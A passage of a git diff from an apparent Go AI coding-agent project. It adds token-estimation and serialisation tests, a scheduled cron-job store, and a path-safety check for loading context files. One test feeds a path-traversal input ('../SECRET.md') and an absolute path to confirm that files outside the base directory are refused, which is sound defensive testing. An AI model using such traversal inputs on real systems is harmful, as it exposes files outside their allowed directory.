+func serializeContentBlocks(blocks []provider.ContentBlock) string {
+	var parts []string
+	for _, block := range blocks {
+		switch block.Type {
+		case "text":
+			if block.Text != "" {
+				parts = append(parts, block.Text)
+			}
+		case "image":
+			if block.Image != nil {
+				parts = append(parts, fmt.Sprintf("[image: %s]", block.Image.MimeType))
+			} else {
+				parts = append(parts, "[image]")
+			}
+		case "thinking":
+			parts = append(parts, fmt.Sprintf("[thinking: %s]", block.Thinking))
+		case "toolCall":
+			if block.ToolCall != nil {
+				parts = append(parts, fmt.Sprintf("[tool_call: %s(%s)]", block.ToolCall.Name, string(block.ToolCall.Arguments)))
+			}
+		}
+	}
+	return strings.Join(parts, "\n")
+}
+
+func truncateString(s string, maxLen int) string {
+	return util.TruncateWithSuffix(s, maxLen, "...")
 }
 
 // compressionInstruction is the instruction injected into the conversation for Insert-then-Compress.
diff --git a/internal/context/context_test.go b/internal/context/context_test.go
index 3178b90..ffc1756 100644
--- a/internal/context/context_test.go
+++ b/internal/context/context_test.go
@@ -1,6 +1,7 @@
 package context
 
 import (
+	"strings"
 	"testing"
 
 	"github.com/startvibecoding/vibecoding/internal/provider"
@@ -194,6 +195,239 @@ func TestFindCutPoint(t *testing.T) {
 	}
 }
 
+func TestEstimateTokensImage(t *testing.T) {
+	msg := provider.Message{
+		Role: "user",
+		Contents: []provider.ContentBlock{
+			{Type: "image", Image: &provider.ImageContent{MimeType: "image/png", Data: "base64data"}},
+		},
+	}
+	result := EstimateTokens(msg)
+	if result != 1200 { // 4800 chars / 4 = 1200
+		t.Errorf("EstimateTokens(image) = %d, want 1200", result)
+	}
+}
+
+func TestEstimateTokensThinking(t *testing.T) {
+	msg := provider.Message{
+		Role: "assistant",
+		Contents: []provider.ContentBlock{
+			{Type: "thinking", Thinking: "Let me think about this..."},
+		},
+	}
+	result := EstimateTokens(msg)
+	expected := (len("Let me think about this...") + 3) / 4
+	if result != expected {
+		t.Errorf("EstimateTokens(thinking) = %d, want %d", result, expected)
+	}
+}
+
+func TestEstimateTokensContentBlocksTakePrecedence(t *testing.T) {
+	// When Contents is non-empty, Content should be ignored
+	msg := provider.Message{
+		Role:    "assistant",
+		Content: "This should be ignored because Contents is set",
+		Contents: []provider.ContentBlock{
+			{Type: "text", Text: "Short"},
+		},
+	}
+	result := EstimateTokens(msg)
+	expected := (len("Short") + 3) / 4
+	if result != expected {
+		t.Errorf("EstimateTokens() = %d, want %d (should use Contents, not Content)", result, expected)
+	}
+}
+
+func TestEstimateTokensToolCallNilBlock(t *testing.T) {
+	msg := provider.Message{
+		Role: "assistant",
+		Contents: []provider.ContentBlock{
+			{Type: "toolCall", ToolCall: nil},
+		},
+	}
+	result := EstimateTokens(msg)
+	if result != 0 { // 0 chars -> (0+3)/4 = 0
+		t.Errorf("EstimateTokens(nil toolCall) = %d, want 0", result)
+	}
+}
+
+func TestCalculateContextTokensFallback(t *testing.T) {
+	// When TotalTokens is 0, should sum components
+	usage := &provider.Usage{
+		Input:       100,
+		Output:      50,
+		CacheRead:   20,
+		CacheWrite:  10,
+		TotalTokens: 0,
+	}
+	result := CalculateContextTokens(usage)
+	if result != 180 {
+		t.Errorf("CalculateContextTokens() = %d, want 180", result)
+	}
+}
+
+func TestEstimateContextTokensNoUsage(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "user", Content: "Hello"},
+		{Role: "assistant", Content: "Hi there"},
+	}
+
+	tokens, lastUsageIndex := EstimateContextTokens(messages)
+	if lastUsageIndex != -1 {
+		t.Errorf("lastUsageIndex = %d, want -1", lastUsageIndex)
+	}
+	// Should estimate all messages
+	expected := EstimateTokens(messages[0]) + EstimateTokens(messages[1])
+	if tokens != expected {
+		t.Errorf("tokens = %d, want %d", tokens, expected)
+	}
+}
+
+func TestEstimateContextTokensEmptyMessages(t *testing.T) {
+	tokens, lastUsageIndex := EstimateContextTokens(nil)
+	if tokens != 0 {
+		t.Errorf("tokens = %d, want 0", tokens)
+	}
+	if lastUsageIndex != -1 {
+		t.Errorf("lastUsageIndex = %d, want -1", lastUsageIndex)
+	}
+}
+
+func TestEstimateContextTokensUsageWithZeroTotal(t *testing.T) {
+	// Usage present but TotalTokens=0 → should skip and estimate manually
+	messages := []provider.Message{
+		{Role: "user", Content: "Hello"},
+		{Role: "assistant", Content: "Hi", Usage: &provider.Usage{TotalTokens: 0}},
+	}
+	_, lastUsageIndex := EstimateContextTokens(messages)
+	// Usage TotalTokens=0 means we skip it
+	if lastUsageIndex != -1 {
+		t.Errorf("lastUsageIndex = %d, want -1 (zero TotalTokens should be skipped)", lastUsageIndex)
+	}
+}
+
+func TestFindValidCutPoints(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "user", Content: "msg1"},
+		{Role: "assistant", Content: "resp1"},
+		{Role: "toolResult", Content: "result1"},
+		{Role: "user", Content: "msg2"},
+		{Role: "assistant", Content: "resp2"},
+	}
+
+	cuts := FindValidCutPoints(messages, 0, len(messages))
+	// Should include indices 0,1,3,4 but NOT 2 (toolResult)
+	expected := []int{0, 1, 3, 4}
+	if len(cuts) != len(expected) {
+		t.Fatalf("FindValidCutPoints() = %v, want %v", cuts, expected)
+	}
+	for i, c := range cuts {
+		if c != expected[i] {
+			t.Errorf("cuts[%d] = %d, want %d", i, c, expected[i])
+		}
+	}
+}
+
+func TestFindValidCutPointsSubrange(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "user"},
+		{Role: "assistant"},
+		{Role: "user"},
+		{Role: "assistant"},
+	}
+
+	cuts := FindValidCutPoints(messages, 1, 3)
+	expected := []int{1, 2}
+	if len(cuts) != len(expected) {
+		t.Fatalf("FindValidCutPoints(1,3) = %v, want %v", cuts, expected)
+	}
+}
+
+func TestFindValidCutPointsEmpty(t *testing.T) {
+	cuts := FindValidCutPoints(nil, 0, 0)
+	if len(cuts) != 0 {
+		t.Errorf("FindValidCutPoints(nil) = %v, want empty", cuts)
+	}
+}
+
+func TestFindTurnStartIndex(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "user"},
+		{Role: "assistant"},
+		{Role: "toolResult"},
+		{Role: "assistant"},
+	}
+
+	// From index 3, should find user at index 0
+	idx := FindTurnStartIndex(messages, 3, 0)
+	if idx != 0 {
+		t.Errorf("FindTurnStartIndex(3) = %d, want 0", idx)
+	}
+
+	// From index 1, should find user at index 0
+	idx = FindTurnStartIndex(messages, 1, 0)
+	if idx != 0 {
+		t.Errorf("FindTurnStartIndex(1) = %d, want 0", idx)
+	}
+
+	// No user message found
+	noUserMsgs := []provider.Message{
+		{Role: "assistant"},
+		{Role: "toolResult"},
+	}
+	idx = FindTurnStartIndex(noUserMsgs, 1, 0)
+	if idx != -1 {
+		t.Errorf("FindTurnStartIndex(no user) = %d, want -1", idx)
+	}
+}
+
+func TestFindCutPointNoCutPoints(t *testing.T) {
+	// All toolResult messages → no valid cut points
+	messages := []provider.Message{
+		{Role: "toolResult", Content: "result1"},
+		{Role: "toolResult", Content: "result2"},
+	}
+
+	result := FindCutPoint(messages, 0, len(messages), 10)
+	if result.FirstKeptIndex != 0 {
+		t.Errorf("FirstKeptIndex = %d, want 0", result.FirstKeptIndex)
+	}
+	if result.TurnStartIndex != -1 {
+		t.Errorf("TurnStartIndex = %d, want -1", result.TurnStartIndex)
+	}
+}
+
+func TestFindCutPointSplitTurn(t *testing.T) {
+	// Create messages where cut lands on an assistant message (not user)
+	messages := []provider.Message{
+		{Role: "user", Content: "first question"},
+		{Role: "assistant", Content: "first answer"},
+		{Role: "user", Content: "second question"},
+		{Role: "assistant", Content: strings.Repeat("x", 200)}, // large
+		{Role: "user", Content: "third question"},
+		{Role: "assistant", Content: strings.Repeat("y", 200)}, // large
+	}
+
+	// keepRecentTokens small enough to trigger cut in the middle
+	result := FindCutPoint(messages, 0, len(messages), 20)
+	if result.FirstKeptIndex < 0 || result.FirstKeptIndex >= len(messages) {
+		t.Errorf("FirstKeptIndex = %d, out of range", result.FirstKeptIndex)
+	}
+}
+
+func TestFindCutPointKeepAll(t *testing.T) {
+	// keepRecentTokens very large → keep all messages
+	messages := []provider.Message{
+		{Role: "user", Content: "Hello"},
+		{Role: "assistant", Content: "Hi"},
+	}
+
+	result := FindCutPoint(messages, 0, len(messages), 999999)
+	if result.FirstKeptIndex != 0 {
+		t.Errorf("FirstKeptIndex = %d, want 0 (should keep all)", result.FirstKeptIndex)
+	}
+}
+
 func TestSerializeConversation(t *testing.T) {
 	messages := []provider.Message{
 		{Role: "user", Content: "Hello"},
@@ -212,6 +446,183 @@ func TestSerializeConversation(t *testing.T) {
 	}
 }
 
+func TestSerializeConversationToolResult(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "toolResult", ToolName: "bash", Content: "output here"},
+	}
+
+	result := SerializeConversation(messages)
+	if !contains(result, "Tool Result [bash]") {
+		t.Error("SerializeConversation() missing tool result")
+	}
+	if !contains(result, "output here") {
+		t.Error("SerializeConversation() missing tool output")
+	}
+}
+
+func TestSerializeConversationThinking(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "assistant", Contents: []provider.ContentBlock{
+			{Type: "thinking", Thinking: "hmm let me think"},
+			{Type: "text", Text: "Here is my answer"},
+		}},
+	}
+
+	result := SerializeConversation(messages)
+	if !contains(result, "[thinking: hmm let me think]") {
+		t.Error("SerializeConversation() missing thinking block")
+	}
+	if !contains(result, "Here is my answer") {
+		t.Error("SerializeConversation() missing text content")
+	}
+}
+
+func TestSerializeConversationToolCall(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "assistant", Contents: []provider.ContentBlock{
+			{Type: "toolCall", ToolCall: &provider.ToolCallBlock{Name: "read", Arguments: []byte(`{"path":"foo.go"}`)}},
+		}},
+	}
+
+	result := SerializeConversation(messages)
+	if !contains(result, "[tool_call: read(") {
+		t.Errorf("SerializeConversation() missing tool call, got: %s", result)
+	}
+}
+
+func TestSerializeConversationSystemInjectedSkipped(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "user", Content: "Hello", SystemInjected: true},
+		{Role: "user", Content: "World"},
+	}
+
+	result := SerializeConversation(messages)
+	if contains(result, "Hello") {
+		t.Error("SerializeConversation() should skip system injected messages")
+	}
+	if !contains(result, "World") {
+		t.Error("SerializeConversation() should include normal messages")
+	}
+}
+
+func TestSerializeConversationUserContentBlocks(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "user", Contents: []provider.ContentBlock{
+			{Type: "text", Text: "block content"},
+		}},
+	}
+
+	result := SerializeConversation(messages)
+	if !contains(result, "User: block content") {
+		t.Errorf("SerializeConversation() missing user content block, got: %s", result)
+	}
+}
+
+func TestSerializeConversationUserNonTextContentBlocks(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "user", Contents: []provider.ContentBlock{
+			{Type: "image", Image: &provider.ImageContent{MimeType: "image/png", Data: "abc"}},
+		}},
+	}
+
+	result := SerializeConversation(messages)
+	if !contains(result, "[image: image/png]") {
+		t.Errorf("SerializeConversation() missing image block, got: %s", result)
+	}
+}
+
+func TestSerializeConversationToolResultContentBlocks(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "toolResult", ToolName: "read", Contents: []provider.ContentBlock{
+			{Type: "text", Text: "tool block output"},
+		}},
+	}
+
+	result := SerializeConversation(messages)
+	if !contains(result, "tool block output") {
+		t.Errorf("SerializeConversation() missing tool result content block, got: %s", result)
+	}
+}
+
+func TestSerializeConversationLongToolResult(t *testing.T) {
+	longContent := strings.Repeat("x", 600)
+	messages := []provider.Message{
+		{Role: "toolResult", ToolName: "bash", Content: longContent},
+	}
+
+	result := SerializeConversation(messages)
+	// Should be truncated to 500 chars + "..."
+	if !contains(result, "...") {
+		t.Error("SerializeConversation() should truncate long tool results")
+	}
+}
+
+func TestTruncateString(t *testing.T) {
+	tests := []struct {
+		input    string
+		maxLen   int
+		expected string
+	}{
+		{"short", 10, "short"},
+		{"exact", 5, "exact"},
+		{"toolong", 4, "tool..."},
+		{"你好世界", 5, "你..."},
+		{"", 10, ""},
+	}
+
+	for _, tt := range tests {
+		result := truncateString(tt.input, tt.maxLen)
+		if result != tt.expected {
+			t.Errorf("truncateString(%q, %d) = %q, want %q", tt.input, tt.maxLen, result, tt.expected)
+		}
+	}
+}
+
+func TestDefaultCompactionSettings(t *testing.T) {
+	s := DefaultCompactionSettings()
+	if !s.Enabled {
+		t.Error("expected Enabled=true")
+	}
+	if s.ReserveTokens != 16384 {
+		t.Errorf("ReserveTokens = %d, want 16384", s.ReserveTokens)
+	}
+	if s.KeepRecentTokens != 20000 {
+		t.Errorf("KeepRecentTokens = %d, want 20000", s.KeepRecentTokens)
+	}
+	if s.IdleCompressionEnabled {
+		t.Error("expected IdleCompressionEnabled=false")
+	}
+	if s.IdleTimeoutSeconds != 90 {
+		t.Errorf("IdleTimeoutSeconds = %d, want 90", s.IdleTimeoutSeconds)
+	}
+	if s.IdleMinTokensForCompress != 150000 {
+		t.Errorf("IdleMinTokensForCompress = %d, want 150000", s.IdleMinTokensForCompress)
+	}
+}
+
+func TestShouldCompactExact(t *testing.T) {
+	// Exactly at threshold
+	if ShouldCompact(183616, 200000, 16384) {
+		t.Error("exactly at threshold should NOT compact")
+	}
+	// One token over
+	if !ShouldCompact(183617, 200000, 16384) {
+		t.Error("one over threshold should compact")
+	}
+}
+
+func TestAbsHelper(t *testing.T) {
+	if abs(-5) != 5 {
+		t.Errorf("abs(-5) = %d, want 5", abs(-5))
+	}
+	if abs(5) != 5 {
+		t.Errorf("abs(5) = %d, want 5", abs(5))
+	}
+	if abs(0) != 0 {
+		t.Errorf("abs(0) = %d, want 0", abs(0))
+	}
+}
+
 func contains(s, substr string) bool {
 	return len(s) >= len(substr) && (s == substr || len(s) > 0 && containsSubstring(s, substr))
 }
diff --git a/internal/contextfiles/contextfiles.go b/internal/contextfiles/contextfiles.go
index 1222556..7143949 100644
--- a/internal/contextfiles/contextfiles.go
+++ b/internal/contextfiles/contextfiles.go
@@ -66,7 +66,10 @@ func LoadContextFiles(cwd string, globalConfigDir string, extraFiles []string) *
 	// 1. Load from current directory (highest priority)
 	// Only the first matching file is loaded per directory (priority order: AGENTS.md > CLAUDE.md > ...)
 	for _, name := range uniqueNames {
-		path := filepath.Join(cwd, name)
+		path, ok := safeContextFilePath(cwd, name)
+		if !ok {
+			continue
+		}
 		if content, err := os.ReadFile(path); err == nil {
 			result.ProjectFiles = append(result.ProjectFiles, FileContent{
 				Path:    path,
@@ -91,7 +94,10 @@ func LoadContextFiles(cwd string, globalConfigDir string, extraFiles []string) *
 
 		// Only the first matching file is loaded per parent directory
 		for _, name := range uniqueNames {
-			path := filepath.Join(parent, name)
+			path, ok := safeContextFilePath(parent, name)
+			if !ok {
+				continue
+			}
 			if content, err := os.ReadFile(path); err == nil {
 				result.ParentFiles = append(result.ParentFiles, FileContent{
 					Path:    path,
@@ -108,7 +114,10 @@ func LoadContextFiles(cwd string, globalConfigDir string, extraFiles []string) *
 	// Only the first matching file is loaded
 	if globalConfigDir != "" {
 		for _, name := range uniqueNames {
-			path := filepath.Join(globalConfigDir, name)
+			path, ok := safeContextFilePath(globalConfigDir, name)
+			if !ok {
+				continue
+			}
 			if content, err := os.ReadFile(path); err == nil {
 				result.GlobalFiles = append(result.GlobalFiles, FileContent{
 					Path:    path,
@@ -123,6 +132,19 @@ func LoadContextFiles(cwd string, globalConfigDir string, extraFiles []string) *
 	return result
 }
 
+func safeContextFilePath(baseDir, name string) (string, bool) {
+	if filepath.IsAbs(name) {
+		return "", false
+	}
+	base := filepath.Clean(baseDir)
+	path := filepath.Clean(filepath.Join(base, name))
+	rel, err := filepath.Rel(base, path)
+	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
+		return "", false
+	}
+	return path, true
+}
+
 // BuildContextString concatenates all context files into a single string
 // suitable for appending to the system prompt.
 // Order: global -> parent (root to cwd) -> project (current dir)
diff --git a/internal/contextfiles/contextfiles_test.go b/internal/contextfiles/contextfiles_test.go
index baafad0..4505513 100644
--- a/internal/contextfiles/contextfiles_test.go
+++ b/internal/contextfiles/contextfiles_test.go
@@ -86,6 +86,24 @@ func TestExtraFiles(t *testing.T) {
 	}
 }
 
+func TestExtraFilesCannotEscapeBaseDir(t *testing.T) {
+	tmpDir := t.TempDir()
+	projectDir := filepath.Join(tmpDir, "project")
+	os.MkdirAll(projectDir, 0755)
+
+	os.WriteFile(filepath.Join(tmpDir, "SECRET.md"), []byte("# Secret"), 0644)
+	os.WriteFile(filepath.Join(projectDir, "SAFE.md"), []byte("# Safe"), 0644)
+
+	result := LoadContextFiles(projectDir, "", []string{"../SECRET.md", filepath.Join(tmpDir, "SECRET.md"), "SAFE.md"})
+
+	if len(result.ProjectFiles) != 1 {
+		t.Fatalf("expected 1 project file, got %d", len(result.ProjectFiles))
+	}
+	if result.ProjectFiles[0].Name != "SAFE.md" {
+		t.Fatalf("loaded %q, want SAFE.md", result.ProjectFiles[0].Name)
+	}
+}
+
 func TestParentFiles(t *testing.T) {
 	// Create nested directory structure
 	tmpDir := t.TempDir()
diff --git a/internal/cron/cron.go b/internal/cron/cron.go
new file mode 100644
index 0000000..b92740f
--- /dev/null
+++ b/internal/cron/cron.go
@@ -0,0 +1,168 @@
+// Package cron implements scheduled task management for vibecoding.
+// Cron jobs are persisted to disk and executed by spawning sub-agents.
+package cron
+
+import (
+	"crypto/rand"
+	"encoding/hex"
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+	"sync"
+	"sync/atomic"
+	"time"
+)
+
+var fallbackCronCounter uint64
+
+// CronJob represents a scheduled task.
+type CronJob struct {
+	ID         string    `json:"id"`
+	Name       string    `json:"name"`              // Short description
+	Prompt     string    `json:"prompt"`            // Task prompt for sub-agent
+	Schedule   string    `json:"schedule"`          // Schedule: @daily, @every 30m, 5-field cron, or empty for one-shot
+	OneShot    bool      `json:"oneshot,omitempty"` // If true, auto-disable after first run
+	Mode       string    `json:"mode"`              // "agent" or "yolo"
+	WorkDir    string    `json:"work_dir,omitempty"`
+	A2ATarget  string    `json:"a2a_target,omitempty"` // A2A server URL (if set, send task via A2A protocol)
+	A2AToken   string    `json:"a2a_token,omitempty"`  // Bearer token for A2A server
+	Enabled    bool      `json:"enabled"`
+	CreatedAt  time.Time `json:"created_at"`
+	LastRun    time.Time `json:"last_run,omitempty"`
+	NextRun    time.Time `json:"next_run,omitempty"`
+	RunCount   int       `json:"run_count"`
+	LastStatus string    `json:"last_status,omitempty"` // "success", "failed", "running"
+	LastError  string    `json:"last_error,omitempty"`
+}
+
+// CronStore is the interface for cron job persistence.
+type CronStore interface {
+	List() ([]CronJob, error)
+	Get(id string) (*CronJob, error)
+	Create(job CronJob) (*CronJob, error)
+	Update(job CronJob) error
+	Delete(id string) error
+}
+
+// FileCronStore persists cron jobs to a JSON file.
+type FileCronStore struct {
+	mu   sync.RWMutex
+	path string
+	jobs map[string]*CronJob
+}
+
+// NewFileCronStore creates a new file-based cron store.
+func NewFileCronStore(path string) *FileCronStore {
+	s := &FileCronStore{
+		path: path,
+		jobs: make(map[string]*CronJob),
+	}
+	s.load()
+	return s
+}
+
+func (s *FileCronStore) load() {
+	data, err := os.ReadFile(s.path)
+	if err != nil {
+		return // File doesn't exist yet
+	}
+	var jobs []CronJob
+	if err := json.Unmarshal(data, &jobs); err != nil {
+		return
+	}
+	for i := range jobs {
+		s.jobs[jobs[i].ID] = &jobs[i]
+	}
+}
+
+func (s *FileCronStore) save() error {
+	jobs := make([]CronJob, 0, len(s.jobs))
+	for _, j := range s.jobs {
+		jobs = append(jobs, *j)
+	}
+	data, err := json.MarshalIndent(jobs, "", "  ")
+	if err != nil {
+		return fmt.Errorf("marshal cron jobs: %w", err)
+	}
+	dir := filepath.Dir(s.path)
+	if err := os.MkdirAll(dir, 0700); err != nil {
+		return fmt.Errorf("create cron dir: %w", err)
+	}
+	return os.WriteFile(s.path, data, 0600)
+}
+
+// List returns all cron jobs.
+func (s *FileCronStore) List() ([]CronJob, error) {
+	s.mu.RLock()
+	defer s.mu.RUnlock()
+	jobs := make([]CronJob, 0, len(s.jobs))
+	for _, j := range s.jobs {
+		jobs = append(jobs, *j)
+	}
+	return jobs, nil
+}
+
+// Get returns a cron job by ID.
+func (s *FileCronStore) Get(id string) (*CronJob, error) {
+	s.mu.RLock()
+	defer s.mu.RUnlock()
+	j, ok := s.jobs[id]
+	if !ok {
+		return nil, fmt.Errorf("cron job %q not found", id)
+	}
+	copy := *j
+	return &copy, nil
+}
+
+// Create adds a new cron job.
+func (s *FileCronStore) Create(job CronJob) (*CronJob, error) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	if job.ID == "" {
+		job.ID = newCronID()
+	}
+	if _, exists := s.jobs[job.ID]; exists {
+		return nil, fmt.Errorf("cron job %q already exists", job.ID)
+	}
+	job.CreatedAt = time.Now()
+	copy := job
+	s.jobs[job.ID] = &copy
+	if err := s.save(); err != nil {
+		delete(s.jobs, job.ID)
+		return nil, err
+	}
+	return &copy, nil
+}
+
+func newCronID() string {
+	var b [16]byte
+	if _, err := rand.Read(b[:]); err == nil {
+		return "cron-" + hex.EncodeToString(b[:])
+	}
+	n := atomic.AddUint64(&fallbackCronCounter, 1)
+	return fmt.Sprintf("cron-%d-%d", time.Now().UnixNano(), n)
+}
+
+// Update updates an existing cron job.
+func (s *FileCronStore) Update(job CronJob) error {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	if _, ok := s.jobs[job.ID]; !ok {
+		return fmt.Errorf("cron job %q not found", job.ID)
+	}
+	copy := job
+	s.jobs[job.ID] = &copy
+	return s.save()
+}
+
+// Delete removes a cron job.
+func (s *FileCronStore) Delete(id string) error {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	if _, ok := s.jobs[id]; !ok {
+		return fmt.Errorf("cron job %q not found", id)
+	}
+	delete(s.jobs, id)
+	return s.save()
+}
diff --git a/internal/cron/cron_test.go b/internal/cron/cron_test.go
new file mode 100644
index 0000000..dfab660
--- /dev/null
+++ b/internal/cron/cron_test.go
@@ -0,0 +1,408 @@
+package cron
+
+import (
+	"os"
+	"path/filepath"
+	"sync"
+	"testing"
+	"time"
+)
+
+func TestFileCronStoreCreate(t *testing.T) {
+	tmp := t.TempDir()
+	store := NewFileCronStore(filepath.Join(tmp, "cron.json"))
+
+	job, err := store.Create(CronJob{
+		Name:     "test job",
+		Prompt:   "do something",
+		Schedule: "0 9 * * *",
+		Mode:     "agent",
+		Enabled:  true,
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if job.ID == "" {
+		t.Error("expected non-empty ID")
+	}
+	if job.Name != "test job" {
+		t.Errorf("expected 'test job', got %q", job.Name)
+	}
+	if job.CreatedAt.IsZero() {
+		t.Error("expected CreatedAt to be set")
+	}
+}
+
+func TestFileCronStoreCreateDuplicate(t *testing.T) {
+	tmp := t.TempDir()
+	store := NewFileCronStore(filepath.Join(tmp, "cron.json"))
+
+	store.Create(CronJob{ID: "j1", Name: "first"})
+	_, err := store.Create(CronJob{ID: "j1", Name: "duplicate"})
+	if err == nil {
+		t.Fatal("expected error for duplicate ID")
+	}
+}
+
+func TestNewCronIDConcurrentUnique(t *testing.T) {
+	const count = 500
+	var wg sync.WaitGroup
+	ids := make(chan string, count)
+
+	for i := 0; i < count; i++ {
+		wg.Add(1)
+		go func() {
+			defer wg.Done()
+			ids <- newCronID()
+		}()
+	}
+	wg.Wait()
+	close(ids)
+
+	seen := make(map[string]bool, count)
+	for id := range ids {
+		if seen[id] {
+			t.Fatalf("duplicate id: %s", id)
+		}
+		seen[id] = true
+	}
+}
+
+func TestFileCronStoreList(t *testing.T) {
+	tmp := t.TempDir()
+	store := NewFileCronStore(filepath.Join(tmp, "cron.json"))
+
+	store.Create(CronJob{Name: "job1"})
+	store.Create(CronJob{Name: "job2"})
+	store.Create(CronJob{Name: "job3"})
+
+	jobs, err := store.List()
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(jobs) != 3 {
+		t.Errorf("expected 3 jobs, got %d", len(jobs))
+	}
+}
+
+func TestFileCronStoreGet(t *testing.T) {
+	tmp := t.TempDir()
+	store := NewFileCronStore(filepath.Join(tmp, "cron.json"))
+
+	created, _ := store.Create(CronJob{ID: "j1", Name: "test"})
+
+	got, err := store.Get("j1")
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if got.Name != created.Name {
+		t.Errorf("expected %q, got %q", created.Name, got.Name)
+	}
+}
+
+func TestFileCronStoreGetNotFound(t *testing.T) {
+	tmp := t.TempDir()
+	store := NewFileCronStore(filepath.Join(tmp, "cron.json"))
+
+	_, err := store.Get("nonexistent")
+	if err == nil {
+		t.Fatal("expected error")
+	}
+}
+
+func TestFileCronStoreUpdate(t *testing.T) {
+	tmp := t.TempDir()
+	store := NewFileCronStore(filepath.Join(tmp, "cron.json"))
+
+	store.Create(CronJob{ID: "j1", Name: "original"})
+
+	job, _ := store.Get("j1")
+	job.Name = "updated"
+	job.RunCount = 5
+	if err := store.Update(*job); err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	got, _ := store.Get("j1")
+	if got.Name != "updated" {
+		t.Errorf("expected 'updated', got %q", got.Name)
+	}
+	if got.RunCount != 5 {
+		t.Errorf("expected RunCount=5, got %d", got.RunCount)
+	}
+}
+
+func TestFileCronStoreUpdateNotFound(t *testing.T) {
+	tmp := t.TempDir()
+	store := NewFileCronStore(filepath.Join(tmp, "cron.json"))
+
+	err := store.Update(CronJob{ID: "nonexistent"})
+	if err == nil {
+		t.Fatal("expected error")
+	}
+}
+
+func TestFileCronStoreDelete(t *testing.T) {
+	tmp := t.TempDir()
+	store := NewFileCronStore(filepath.Join(tmp, "cron.json"))
+
+	store.Create(CronJob{ID: "j1", Name: "to delete"})
+
+	if err := store.Delete("j1"); err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	_, err := store.Get("j1")
+	if err == nil {
+		t.Fatal("expected error after deletion")
+	}
+}
+
+func TestFileCronStoreDeleteNotFound(t *testing.T) {
+	tmp := t.TempDir()
+	store := NewFileCronStore(filepath.Join(tmp, "cron.json"))
+
+	err := store.Delete("nonexistent")
+	if err == nil {
+		t.Fatal("expected error")
+	}
+}
+
+func TestFileCronStorePersistence(t *testing.T) {
+	tmp := t.TempDir()
+	path := filepath.Join(tmp, "cron.json")
+
+	store1 := NewFileCronStore(path)
+	store1.Create(CronJob{ID: "j1", Name: "persistent", Prompt: "test"})
+
+	// Create a new store from the same file
+	store2 := NewFileCronStore(path)
+	got, err := store2.Get("j1")
+	if err != nil {
+		t.Fatalf("expected job to persist, got error: %v", err)
+	}
+	if got.Name != "persistent" {
+		t.Errorf("expected 'persistent', got %q", got.Name)
+	}
+}
+
+func TestFileCronStoreInvalidFile(t *testing.T) {
+	tmp := t.TempDir()
+	path := filepath.Join(tmp, "invalid.json")
+	os.WriteFile(path, []byte("not json"), 0600)
+
+	// Should not panic, just return empty
+	store := NewFileCronStore(path)
+	jobs, _ := store.List()
+	if len(jobs) != 0 {
+		t.Errorf("expected 0 jobs from invalid file, got %d", len(jobs))
+	}
+}
+
+// --- Scheduler tests ---
+
+func TestSchedulerStartStop(t *testing.T) {
+	tmp := t.TempDir()
+	store := NewFileCronStore(filepath.Join(tmp, "cron.json"))
+
+	// Create a mock manager (nil factory is ok for basic lifecycle tests)
+	sched := NewScheduler(store, nil, 1*time.Second)
+
+	if sched.IsRunning() {
+		t.Error("expected not running initially")
+	}
+
+	sched.Start()
+	if !sched.IsRunning() {
+		t.Error("expected running after start")
+	}
+
+	// Double start should be no-op
+	sched.Start()
+
+	sched.Stop()
+	if sched.IsRunning() {
+		t.Error("expected not running after stop")
+	}
+
+	// Double stop should be no-op
+	sched.Stop()
+}
+
+func TestSchedulerDefaultInterval(t *testing.T) {
+	tmp := t.TempDir()
+	store := NewFileCronStore(filepath.Join(tmp, "cron.json"))
+	sched := NewScheduler(store, nil, 0)
+
+	if sched.interval != 30*time.Second {
+		t.Errorf("expected 30s default interval, got %v", sched.interval)
+	}
+}
+
+func TestSchedulerUpdateJobPreservesExistingFields(t *testing.T) {
+	tmp := t.TempDir()
+	store := NewFileCronStore(filepath.Join(tmp, "cron.json"))
+	store.Create(CronJob{ID: "j1", Name: "keep name", Schedule: "@daily", Enabled: true})
+
+	sched := NewScheduler(store, nil, time.Second)
+	sched.updateJob("j1", func(job *CronJob) {
+		job.LastStatus = "running"
+	})
+
+	got, err := store.Get("j1")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if got.Name != "keep name" {
+		t.Fatalf("name = %q, want keep name", got.Name)
+	}
+	if got.LastStatus != "running" {
+		t.Fatalf("last status = %q, want running", got.LastStatus)
+	}
+}
+
+func TestIsDueNeverRun(t *testing.T) {
+	s := &Scheduler{}
+	job := CronJob{Enabled: true}
+	if !s.isDue(job, time.Now()) {
+		t.Error("expected due for never-run job")
+	}
+}
+
+func TestIsDueNextRunPassed(t *testing.T) {
+	s := &Scheduler{}
+	job := CronJob{
+		Enabled: true,
+		LastRun: time.Now().Add(-2 * time.Hour),
+		NextRun: time.Now().Add(-1 * time.Hour),
+	}
+	if !s.isDue(job, time.Now()) {
+		t.Error("expected due when NextRun has passed")
+	}
+}
+
+func TestIsDueRecentRun(t *testing.T) {
+	s := &Scheduler{}
+	job := CronJob{
+		Enabled: true,
+		LastRun: time.Now().Add(-5 * time.Minute),
+		NextRun: time.Now().Add(55 * time.Minute),
+	}
+	if s.isDue(job, time.Now()) {
+		t.Error("expected not due for recent run with future NextRun")
+	}
+}
+
+func TestIsDueOldRun(t *testing.T) {
+	s := &Scheduler{}
+	// A job with no NextRun and already run — should NOT be due (one-shot already done)
+	job := CronJob{
+		Enabled: true,
